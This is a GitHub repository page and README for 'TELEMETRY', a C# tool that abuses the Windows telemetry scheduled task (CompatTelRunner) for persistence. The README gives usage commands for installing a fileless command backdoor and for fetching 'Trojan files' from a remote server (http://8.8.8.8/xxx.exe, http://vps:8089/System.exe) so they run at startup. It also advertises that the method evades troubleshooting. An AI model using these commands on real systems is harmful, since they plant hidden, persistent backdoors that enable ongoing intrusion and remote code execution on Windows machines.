https://github.com/360-Linton-Lab/Telemetry

WINDOWS TELEMETRY权限维持
https://github.com/360-Linton-Lab/Telemetry

Last synced: about 2 months ago
JSON representation

WINDOWS TELEMETRY权限维持

• Host: GitHub
• URL: https://github.com/360-Linton-Lab/Telemetry
• Owner: 360-Linton-Lab
• Created: 2020-07-02T08:50:29.000Z (over 4 years ago)
• Default Branch: master
• Last Pushed: 2020-07-02T09:03:45.000Z (over 4 years ago)
• Last Synced: 2024-08-05T17:24:20.041Z (5 months ago)
• Language: C#
• Homepage:
• Size: 1.2 MB
• Stars: 259
• Watchers: 7
• Forks: 48
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - 360-Linton-Lab/Telemetry - WINDOWS TELEMETRY权限维持 (C# #)

README

        
# TELEMETRY

### Background

[TELEMETRY](#TELEMETRY-1) is a C# For Windows PERSISTENCE

Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade. 

- **Local admin rights to install (requires the ability to write to HKLM)**

- **Have CompatTelRunner.exe**

- **2008R2/Windows 7 through 2019/Windows 10**

### Advantage

- **Using the system's own Telemetry planned tasks**

- **Only registry suspicious backdoor troubleshooting**

### Command Line Usage

        ABUSING WINDOWS TELEMETRY FOR PERSISTENCE

                                                 .Imanfeng

        Features:

            Install:   -   Deployment authority maintains backdoor

    

        Command:

            TELEMETRY.exe install /command:calc

            -   Execute command without file backdoor

    

            TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe /path:C:\Windows\Temp\check.exe

            -   Remotely download Trojan files to the specified directory for backdoor startup

    

            TELEMETRY.exe install /url:http://8.8.8.8/xxx.exe

            -   Remotely download Trojan files to C:\\Windows\\Temp\\compattelrun.exe for backdoor startup

    

            TELEMETRY.exe install /path:C:\Windows\Temp\check.exe

            -   Set path Trojan files for backdoor startup

    

        Parameter:

            /command: -   Execute Command

            /url:     -   Download FROM

            /path:    -   Download To

- Execute command without file backdoor

  ```

  Telemetry.exe install /command:calc

  ```

  ![1](PIC/2.png)

  

- Remotely download Trojan files for backdoor startup

  ```

  Telemetry.exe install /url:http://vps:8089/System.exe

  ```

  ![2](PIC/1.png)

  

### Learn

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/